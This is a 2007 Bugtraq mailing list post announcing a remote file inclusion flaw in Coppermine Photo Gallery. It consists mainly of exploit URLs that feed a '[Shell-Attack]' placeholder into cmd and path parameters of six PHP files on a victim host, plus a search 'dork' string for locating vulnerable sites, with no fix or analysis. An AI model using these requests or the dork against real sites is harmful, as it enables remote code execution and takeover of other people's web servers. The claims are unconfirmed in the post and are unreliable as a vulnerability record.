Bugtraq mailing list archives

Remote File Include In Script Coppermine Photo Gallery


From: "RaeD Hasadya" <raed () bsdmail com>
Date: Fri, 09 Mar 2007 23:13:04 +0800

By Hasadya Raed
Contact : RaeD () BsdMail Com
------------------------------------
Script : Coppermine Photo Gallery
Expl : Remote Include File 
Dork : "Copyright (c) 2003-2006 Coppermine Dev Team"
------------------------------------
B.Files :
image_processor.php
functions.php
picmgmt.inc.php
plugin_api.inc.php
index.php

Exploits :

http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack]

----------------------------------------

By Hasadya Raed



-- 
_______________________________________________
Get your free email from http://bsdmail.com


Current thread: